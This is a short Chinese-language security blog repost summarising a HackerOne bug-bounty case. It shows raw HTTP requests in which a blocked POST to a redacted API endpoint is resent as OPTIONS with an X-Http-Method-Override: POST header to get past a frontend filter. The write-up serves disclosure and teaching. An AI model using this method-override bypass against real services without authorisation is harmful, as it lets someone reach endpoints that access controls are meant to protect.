通过 OPTIONS 请求+方法走私:HackerOne赏金案例解析

admin 2025年4月29日00:14:02评论3 views字数 695阅读2分19秒阅读模式
假如服务器对于 OPTIONS 的请求过于‘宽容’,会有怎样的惊喜呢?今天让我们来看一个 HackerOne 上的案例。

首先,某网站的端点的请求抓包如下:

POST /user/profile/exists HTTP/2Host: api.[redacted].comAuthorization: Bearer <jwt>Content-Type: application/json;charset=UTF-8{"":""}

请求后的响应是 403 错误。

通过 OPTIONS 请求+方法走私:HackerOne赏金案例解析
file

然后将 POST 请求方式修改为 OPTIONS ,并在请求中添加‘私货’,再次尝试:

OPTIONS /user/profile/exists HTTP/2Host: api.[redacted].comX-Http-Method-Override: POSTAuthorization: Bearer <jwt>Content-Type: application/json;charset=UTF-8{"":""}

获得响应:

通过 OPTIONS 请求+方法走私:HackerOne赏金案例解析
file

虽然前端禁止了 POST 请求,但却疏忽了 OPTIONS 请求,从而使攻击者可以成功绕过 POST 请求限制。

而这种‘疏忽’,却可以让攻击者:

利用被饶过的访问控制,使攻击者可以悄无声息地访问到本应禁止访问的端点

希望对你能有所启发~

原文:https://ayushkr12.medium.com/smuggling-my-way-past-frontend-filters-a-fun-find-on-hackerone-4424dad3a16e

- END -

原文始发于微信公众号(骨哥说事):通过 OPTIONS 请求+方法走私:HackerOne赏金案例解析

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年4月29日00:14:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   通过 OPTIONS 请求+方法走私:HackerOne赏金案例解析https://cn-sec.com/archives/4009639.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息